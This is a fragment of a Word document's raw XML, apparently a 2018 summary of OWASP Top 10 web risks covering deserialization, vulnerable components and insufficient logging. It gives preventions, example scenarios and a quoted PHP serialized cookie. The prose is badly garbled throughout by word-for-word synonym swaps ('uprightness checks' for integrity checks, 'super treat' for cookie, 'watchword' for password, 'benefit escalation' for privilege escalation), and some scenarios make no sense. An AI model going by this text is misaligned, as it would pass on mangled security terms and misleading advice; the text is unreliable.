      <w:r w:rsidR="003175A5">
        <w:t>it</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> can be </w:t>
      </w:r>
      <w:r w:rsidR="003175A5">
        <w:t>used</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to perform</w:t>
      </w:r>
      <w:r w:rsidR="003175A5">
        <w:t xml:space="preserve"> an assault which includes a </w:t>
      </w:r>
      <w:r>
        <w:t>replay attacks, infusion attacks, and benefit escalation attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00FE2181"/>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00BD47BB">
      <w:r>
        <w:t>Preventions</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00BD47BB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:contextualSpacing/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Actualizing uprightness checks, for example, computerized marks on any serialized items to avoid unfriendly question creation or information altering. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00BD47BB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:contextualSpacing/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Enforcing strict write limitations amid deserialization previously question creation as the code regularly expects a quantifiable arrangement of classes. Detours to this procedure have been illustrated, so dependence exclusively on this isn't fitting. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="003175A5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:contextualSpacing/>
      </w:pPr>
      <w:r>
        <w:t>Removing</w:t>
      </w:r>
      <w:r w:rsidR="00BD47BB">
        <w:t xml:space="preserve"> and running code </w:t>
      </w:r>
      <w:r>
        <w:t>which</w:t>
      </w:r>
      <w:r w:rsidR="00BD47BB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>reserializes</w:t>
      </w:r>
      <w:r w:rsidR="00BD47BB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="00BD47BB">
        <w:t xml:space="preserve"> low benefit situations when conceivable. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00BD47BB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:contextualSpacing/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Logging deserialization special cases and disappointments, for example, where the approaching sort isn't the normal kind, or the deserialization tosses special cases. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00FE2181"/>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00BD47BB">
      <w:r>
        <w:t>Examples</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00962AB8" w:rsidRDefault="00962AB8"/>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="003175A5">
      <w:r>
        <w:t>Situation #1:  Calls of a r</w:t>
      </w:r>
      <w:r w:rsidR="00BD47BB">
        <w:t xml:space="preserve">eact application an arrangement of Spring Boot </w:t>
      </w:r>
      <w:r>
        <w:t>micro services</w:t>
      </w:r>
      <w:r w:rsidR="00BD47BB">
        <w:t xml:space="preserve">. Being practical software engineers, they attempted to guarantee that their code is unchanging. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003175A5" w:rsidRDefault="003175A5"/>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00BD47BB">
      <w:r>
        <w:t>Situation #2: A PHP discussion utilizes PHP protest serialization to spare a</w:t>
      </w:r>
      <w:r w:rsidR="00962AB8">
        <w:t xml:space="preserve"> "super" treat, containing the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> client ID, part, watchword hash, and other state: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00BD47BB">
      <w:r>
        <w:t xml:space="preserve">a:4:{i:0;i:132;i:1;s:7:"Mallory";i:2;s:4:"user"; i:3;s:32:"b6a8b3bea87fe0e05022f8f3c88bc960";} </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00FE2181"/>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00BD47BB">
      <w:r>
        <w:t>A9: COMPONENTS WITH KNOWN VULNERABILITIES</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00BD47BB" w:rsidP="000267E3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Examples like libraries, structures, and other programming modules, keep running </w:t>
      </w:r>
      <w:r w:rsidR="003175A5">
        <w:t>with indistinguishable benefits</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> from the application. If the </w:t>
      </w:r>
      <w:r w:rsidR="003175A5">
        <w:t xml:space="preserve">vulnerability of the component is misused, like the </w:t>
      </w:r>
      <w:r>
        <w:t>attack can encourage genuine information</w:t>
      </w:r>
      <w:r w:rsidR="003175A5">
        <w:t xml:space="preserve"> misfortune or </w:t>
      </w:r>
      <w:r>
        <w:t>takeover</w:t>
      </w:r>
      <w:r w:rsidR="003175A5">
        <w:t xml:space="preserve"> of a server. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00860CF0" w:rsidRDefault="00860CF0"/>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00BD47BB">
      <w:r>
        <w:t>Preventions</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00BD47BB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:contextualSpacing/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Remove unused conditions, superfluous highlights, segments, records, and documentation. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00BD47BB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:contextualSpacing/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Continuously stock the renditions of both customer side and server-side segments (e.g. systems, libraries) and their conditions utilizing devices like renditions, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>DependencyCheck</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, retire.js, and so forth. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00BD47BB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:contextualSpacing/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Persistently screen </w:t>
      </w:r>
      <w:r w:rsidR="00E41CD8">
        <w:t>resources</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E41CD8">
        <w:t>such as the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CVE and NVD for </w:t>
      </w:r>
      <w:r w:rsidR="00E41CD8">
        <w:t>vulnerability</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> in the segments. Utilize programming piece investigation devices to robotize the procedure. Buy in to email cautions for security vulnerabilities identified with segments you utilize. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00BD47BB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:contextualSpacing/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Only acquire segments from </w:t>
      </w:r>
      <w:r w:rsidR="00E41CD8">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">sources </w:t>
      </w:r>
      <w:r w:rsidR="00E41CD8">
        <w:t xml:space="preserve">that are official </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">over secure connections. Lean toward marked bundles to lessen the possibility of including an adjusted, pernicious part. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00FE2181"/>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00BD47BB" w:rsidP="00962AB8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2082"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t>Examples</w:t>
      </w:r>
      <w:r w:rsidR="00962AB8">
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00962AB8" w:rsidRDefault="00962AB8" w:rsidP="00962AB8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2082"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00BD47BB">
      <w:r>
        <w:t xml:space="preserve">Situation #1: Components ordinarily keep running with similar benefits as the application itself, so imperfections in any segment can bring about genuine effect. Such imperfections can be incidental (e.g. coding blunder) or on the other hand deliberate (e.g. indirect access in segment). </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00FE2181"/>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00BD47BB">
      <w:r>
        <w:t>A10: INSUFFICIENT LOGGING &amp; MONITORING</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00BD47BB" w:rsidP="000267E3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Inadequate logging and </w:t>
      </w:r>
      <w:r w:rsidR="000267E3">
        <w:t>checking</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> combined with absent or insufficient coordination with episode reaction, enables assailants to additionally assault frameworks, look after determination, turn to more frameworks, and alter, extricate, or crush information. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00860CF0" w:rsidRDefault="00860CF0"/>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00BD47BB">
      <w:r>
        <w:t>Preventions</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00BD47BB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:contextualSpacing/>
      </w:pPr>
      <w:r>
        <w:t>Ensure all login, get to control disappointments, and server-side info approval disappointments can be logged with adequate client setting to distinguish suspicious or pernicious records, and held for adequate time to permit deferred legal investigation.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00BD47BB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:contextualSpacing/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ensure that logs are produced in an organization that can be effectively devoured by an incorporated log administration arrangements. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00BD47BB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:contextualSpacing/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ensure high-esteem exchanges have a review trail with trustworthiness controls to counteract altering or cancellation, for example, add as it were database tables or comparable. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00BD47BB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:contextualSpacing/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Establish viable checking and cautioning to such an extent that suspicious exercises are distinguished and reacted to in a convenient manner. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00FE2181"/>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00BD47BB">
      <w:r>
        <w:t>Examples</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00962AB8" w:rsidRDefault="00962AB8"/>
    <w:p w:rsidR="000267E3" w:rsidRDefault="00BD47BB">
      <w:r>
        <w:t>Situation #1: An open source venture gathering programming keep running by a little group was hacked utilizing a blemish in its product. The assailants figured out how to wipe out the interior source code archive containing the following adaptation, and the greater part of the discussion substance</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000267E3" w:rsidRDefault="000267E3"/>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00BD47BB">
      <w:r>
        <w:t xml:space="preserve">Situation #2: An aggressor utilizes filters for clients utilizing a typical watchword. They can assume control over all records utilizing this secret key. For every other client, this output leaves just a single false login behind. After some days, this might be rehashed with an alternate secret word. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00FE2181"/>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00FE2181">
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:sectPr w:rsidR="00FE21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93973"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7B502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0169D5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9D9E3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A370AA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E9B43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7F342A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F4BC5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63D503A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="002CF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57224E7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F0465BAE"/>
    <w:lvl w:ilvl="0" w:tplc="109208DA">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43474C97"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="078CC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6A60FED"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="32F41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59041E5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3FB0C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84A3AF9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6186C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0"/>
  </w:num>
  <w:num w:numId="4">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="8"/>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
  <w:rsids>
    <w:rsidRoot w:val="00FE2181"/>
    <w:rsid w:val="000267E3"/>
    <w:rsid w:val="00052FA3"/>
    <w:rsid w:val="003175A5"/>
    <w:rsid w:val="003A03EA"/>
    <w:rsid w:val="004019C1"/>
    <w:rsid w:val="006B0E34"/>
    <w:rsid w:val="00726BD5"/>
    <w:rsid w:val="00860CF0"/>
    <w:rsid w:val="00962AB8"/>
    <w:rsid w:val="009B5728"/>
    <w:rsid w:val="00BD47BB"/>
    <w:rsid w:val="00C07476"/>
    <w:rsid w:val="00CE5F24"/>
    <w:rsid w:val="00E41CD8"/>
    <w:rsid w:val="00FE21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41C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D8"/>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="003A03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41C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D8"/>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="003A0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Julina May Gaddi</dc:creator>
  <cp:lastModifiedBy>Julina May Gaddi</cp:lastModifiedBy>
  <cp:revision>8</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-05-13T10:56:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-05-14T16:39:00Z</dcterms:modified>
</cp:coreProperties>
</file>